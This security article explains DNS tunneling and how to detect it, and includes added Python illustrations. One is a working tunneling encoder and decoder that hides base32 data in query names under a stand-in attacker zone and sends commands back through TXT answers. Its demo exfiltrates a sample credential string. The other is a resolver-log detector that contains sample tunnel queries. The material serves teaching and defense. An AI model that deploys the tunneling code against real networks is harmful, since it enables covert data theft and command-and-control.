Beware of DNS Tunneling, the Ingenious Cyber Attack.
Before talking about DNS Tunneling it is necessary to remember that the Domain Name System (DNS) is the protocol that translates human-readable domain names (the host name part of a URL, such as www.example.com) into the machine-readable IP addresses (such as 199.167.52.137) that computers actually use to reach each other.
DNS is a fundamental protocol for the internet and is often described as the “address book of the internet” because it maps domain names to IP addresses.
DNS is used everywhere and is rarely subjected to strict security controls, so it can carry communication and data exchange well outside the protocol's original scope. Cybercriminals have identified this weak point as a place to conduct malicious activities.
Furthermore, because DNS was not designed as a data transport, many organizations do not monitor DNS traffic for malicious activity, and various types of attack therefore use it against corporate networks. DNS Tunneling is one of these attacks.
How DNS Tunneling Works
DNS Tunneling attacks abuse the DNS protocol to carry commands, malware, and other data between a compromised host and an attacker-controlled server in a client-server model.
- The attacker registers a domain, such as badsite.com, and delegates it (through its NS records) to a name server under their control on which a tunneling program is installed. Any DNS query for a name under that domain is eventually forwarded to that server.
- The attacker infects a computer, often located behind a company's firewall. Since DNS traffic is almost always allowed through the firewall, the infected computer can send queries to the organization's DNS resolver. The resolver is a server that forwards queries it cannot answer itself to the root servers, the top-level domain servers, and finally the authoritative server for the domain.
- The resolver therefore routes queries for names under badsite.com to the attacker's command and control server, where the tunneling program is installed. A two-way channel now exists between the victim and the attacker through the DNS resolver: outbound data is encoded in the query names, inbound data in the responses. This tunnel can be used to exfiltrate data or for other malicious purposes. Because there is no direct connection between the attacker and the victim, it is more difficult to trace the attacker's computer.
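The exchange described above, as an added illustrative example that is not part of the original article and not the code of any real tunneling tool: the client splits its data into base32 chunks and embeds each in a query name under an assumed attacker zone (the name tunnel.example, the sequence/session layout and the chunk size are choices made for this example), and the authoritative server reassembles the chunks from the names it receives. The downstream direction rides in TXT answers.

```python
import base64
from collections import defaultdict

DOMAIN = "tunnel.example"   # assumed attacker-controlled zone (illustrative name)
MAX_LABEL = 63              # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253              # RFC 1035: a full name in text form is at most 253 octets
CHUNK = 35                  # 35 bytes -> exactly 56 base32 characters, under MAX_LABEL


def b32(data: bytes) -> str:
    """Base32 without padding, lower-cased. DNS names are case-insensitive and
    resolvers may fold case, which would corrupt base64; base32 survives it."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_upload(session: int, data: bytes, domain: str = DOMAIN) -> list:
    """Client side: one query name per chunk, laid out as
    <seq>.<base32 chunk>.<session>.<domain>. The sequence number makes every
    name unique, so caching resolvers cannot answer from cache and each query
    really reaches the attacker's authoritative server."""
    names = []
    for seq, off in enumerate(range(0, len(data), CHUNK)):
        label = b32(data[off:off + CHUNK])
        assert len(label) <= MAX_LABEL
        name = f"{seq:x}.{label}.{session:x}.{domain}"
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_upload(qnames, domain: str = DOMAIN) -> dict:
    """Server side: reassemble uploads per session from the query names seen
    by the authoritative server for `domain`. Queries may arrive out of order
    (resolver retries, parallel lookups), so chunks are sorted by sequence."""
    parts = defaultdict(dict)
    suffix = "." + domain.lower()
    for name in qnames:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                       # not our zone
        labels = name[:-len(suffix)].split(".")
        if len(labels) != 3:
            continue                       # malformed or not a tunnel query
        seq, payload, session = labels
        try:
            parts[int(session, 16)][int(seq, 16)] = unb32(payload)
        except ValueError:
            continue                       # garbage in the label: ignore it
    return {s: b"".join(chunks[i] for i in sorted(chunks)) for s, chunks in parts.items()}


def encode_download(data: bytes) -> list:
    """Server -> client direction: commands travel in TXT answers. A TXT
    character-string holds at most 255 octets, so longer payloads are split."""
    blob = base64.b64encode(data).decode()  # TXT data is case-preserving, base64 is fine
    return [blob[i:i + 255] for i in range(0, len(blob), 255)]


def decode_download(txt_strings) -> bytes:
    return base64.b64decode("".join(txt_strings))


if __name__ == "__main__":
    stolen = b"user=alice;pass=hunter2;" * 4       # constructed sample payload
    queries = encode_upload(0x1A2B, stolen)
    for q in queries:
        print(q)                                   # what the resolver logs would show
    print(decode_upload(queries)[0x1A2B] == stolen)
    print(decode_download(encode_download(b"whoami\n")))
```

Note what a defender sees in this exchange: many queries from one host to one zone, every name unique, labels far longer than any normal host name, and TXT lookups where the host would otherwise only ever ask for A and AAAA records.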
DNS tunneling has been around for nearly 20 years. Both the Morto and Feederbot malware have been used for DNS tunneling. More recent DNS tunneling attacks include those by the DarkHydrus threat group, which targeted government agencies in the Middle East in 2018, and OilRig, which has been operating since 2016 and is still active.
Prevent DNS Tunneling
DNS is a very powerful tool used everywhere, allowing applications and systems to search for resources and services to interact with.
DNS provides a communications foundation that allows more advanced and powerful protocols to function, but it is easily overlooked from a security perspective, especially when attention is focused on how much malware is distributed via email protocols or downloaded from the web over HTTP.
For these reasons, DNS is the perfect choice for adversaries looking for an always-open, overlooked, and underappreciated protocol to exploit for communications to and from compromised hosts.
Organizations can defend themselves against DNS tunneling in various ways, using both Leonardo Networks' network security platform and open source technologies. Defense can take several forms, including, but not limited to, the following:
- Block domain names (or IP addresses or geographic regions) based on known reputation or perceived threat;
- Rules that alert on unusual DNS queries, such as unexpected record types (TXT, NULL), high query volumes to a single domain, or names made of high-entropy labels;
- Rules on the length, type, or size of incoming and outgoing DNS queries and responses;
- Harden client operating systems and understand their name resolution capabilities, as well as their specific search order;
- User and entity behavior analytics, or other systems that automatically detect anomalies such as access to new domains, especially when the access method and frequency are anomalous.
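The length, type and entropy rules and the "new domains, anomalous frequency" check from the list above, applied to a resolver log, as an added example that is not part of the original article or of any vendor product. The log format ("epoch client qtype qname"), the tunnel.example zone, the long base32 labels and all thresholds are constructed for this example; the "registered domain" is approximated as the last two labels, which a production version would replace with the Public Suffix List.

```python
import math
import re
from collections import defaultdict

# Constructed resolver query log (not a real product's format). The tunnel.example
# names are what a tunneling client emits: one long base32 label per query.
SAMPLE_LOG = """\
1700000000 10.0.0.5 A www.example.com
1700000001 10.0.0.5 AAAA mail.example.com
1700000002 10.0.0.7 A cdn.example.net
1700000002 10.0.0.7 A a1b2c3d4-e5f6-7890-abcd-ef1234567890.devices.example.org
1700000003 10.0.0.9 TXT 0.mfrgg2ltnvsws3tbnvrgkzlsorzgc3tsmuxg64tlmfzxi2dpmvxgy.1a2b.tunnel.example
1700000003 10.0.0.9 TXT 1.orsxg5bnmruwk3tuorrwqylsmxsfc3dpmnqwy2dpon2aw3dpmfwcaltb.1a2b.tunnel.example
1700000004 10.0.0.9 TXT 2.nzsxiylcnfxcaztpojptalrqfyygc3jsfzvca43hmvxgizlsfzpza4dpmrss.1a2b.tunnel.example
1700000004 10.0.0.9 TXT 3.kbqxg43xn5zgiidtoryw4ztsn5wsa5dimutgkylsnfxgoidtonswsidd.1a2b.tunnel.example
1700000005 10.0.0.9 TXT 4.ge2dknjwmyzdm2leg42tsmrrmi4dqzddgm3wemrtgq3tontegi4dqnrtmrrt.1a2b.tunnel.example
1700000005 10.0.0.9 TXT 5.ojsw4yrnmnxw2zlsmrugkidgnfwgkidqojwwg3ldon2gc4tz.1a2b.tunnel.example
1700000006 10.0.0.5 A www.example.com
"""

# Starting-point thresholds to tune against your own baseline, not magic numbers.
NAME_LEN_MAX = 52        # most legitimate names are far shorter than this
LABEL_LEN_MAX = 40       # single labels this long are rare outside CDNs and tunnels
ENTROPY_MIN = 3.5        # bits/char; base32 of compressed or encrypted data tends toward log2(32) = 5
SUSPICIOUS_QTYPES = {"TXT", "NULL", "CNAME", "MX", "SRV"}  # bulky answer types tunnels favour
FLAG_SCORE = 4           # mean per-query score that flags a (client, zone) pair
FLAG_UNIQUE_SUBS = 5     # distinct subdomains from one client that flags a zone

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(text: str) -> float:
    """Bits per character of `text` (0.0 for empty or single-symbol input)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (registered domain, subdomain labels). Simplification: the last
    two labels are taken as the registered domain; use the Public Suffix List
    in real code so that names under e.g. co.uk are handled correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def score_query(qtype: str, qname: str) -> int:
    """Per-query suspicion score from the length, label, entropy and type rules."""
    _zone, sub = split_name(qname)
    score = 0
    if len(qname) > NAME_LEN_MAX:
        score += 2
    if sub and max(len(label) for label in sub) > LABEL_LEN_MAX:
        score += 2
    if shannon_entropy("".join(sub)) > ENTROPY_MIN:
        score += 1
    if qtype.upper() in SUSPICIOUS_QTYPES:
        score += 1
    return score


def analyze(log_text: str) -> dict:
    """Aggregate per (client, registered domain); flag pairs whose mean score is
    high or that touch many distinct subdomains, the 'new names at an anomalous
    frequency' pattern. Malformed lines are skipped rather than crashing the job."""
    stats = defaultdict(lambda: {"queries": 0, "score_sum": 0, "subdomains": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _ts, client, qtype, qname = m.groups()
        zone, sub = split_name(qname)
        entry = stats[(client, zone)]
        entry["queries"] += 1
        entry["score_sum"] += score_query(qtype, qname)
        entry["subdomains"].add(".".join(sub))
    report = {}
    for key, e in stats.items():
        mean = e["score_sum"] / e["queries"]
        report[key] = {
            "queries": e["queries"],
            "mean_score": round(mean, 2),
            "unique_subdomains": len(e["subdomains"]),
            "flagged": mean >= FLAG_SCORE or len(e["subdomains"]) >= FLAG_UNIQUE_SUBS,
        }
    return report


def flagged_zones(log_text: str) -> set:
    return {zone for (_client, zone), r in analyze(log_text).items() if r["flagged"]}


if __name__ == "__main__":
    for key, r in analyze(SAMPLE_LOG).items():
        print(key, r)
    print("flagged:", flagged_zones(SAMPLE_LOG))
```

Scoring several weak signals together, and aggregating per client and zone rather than alerting on single queries, is what keeps the false-positive rate tolerable: the UUID-style device name in the sample log is long and high-entropy but is a single query to a familiar zone, so it stays below the threshold, while the tunnel zone trips both the score and the unique-subdomain rule.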
DNS Security Best Practices
- Train and educate security personnel
Implement a security education and awareness program to train staff to identify malicious threats. Encourage them to take precautions when following links to avoid installing malware. Phishing training can help them recognize, avoid, and report email attacks.
- Implement a threat intelligence program
Understand the threat landscape and implement a threat intelligence program to stay aware of the different types of threats and techniques used by attackers today. With this information, you can ensure you have the right technology to keep your network secure.
- Learn what your DNS data can tell you
Don't just collect DNS traffic. DNS logs are of little value if you don't understand what you're looking at. By understanding the data (the normal query volumes, record types, and domains for your environment) you can recognize and stop DNS threats you have never seen before.
- Don't neglect the management of your DNS resolvers
If a resolver is compromised, it can return false answers that direct your traffic to other compromised systems or enable a man-in-the-middle attack.
- Planning for remote work risk
Develop a remote workforce strategy, as it can put sensitive company data at risk. Warn them not to use unsecured, free, or public Wi-Fi, as adversaries can easily infiltrate between employees and the connection point. Integrate multifactor authentication and prepare for the risk of lost or stolen devices.
- Approaching network security holistically
Take a holistic approach to network security and ensure you have the right capabilities to address various network threat vectors, easily integrated into the entire security stack. When evaluating vendor solutions, it's important to conduct direct comparisons in proof-of-concept. Every environment is different, and independent, neutral DNS-level security testing hasn't yet been established.
- Automate responses, not just alerts
To successfully protect your organization, you need to respond automatically, not just receive alerts. The speed with which attacks are executed often makes alerts on their own ineffective: by the time a threat is identified, it may already be too late. Your security team must be able to automatically identify threats and quarantine potentially infected systems before further damage is done. To ensure your organization follows best practices and gets the most from its Leonardo Networks DNS Security Service, a best-practices assessment is available.
Source paloaltonetworks.com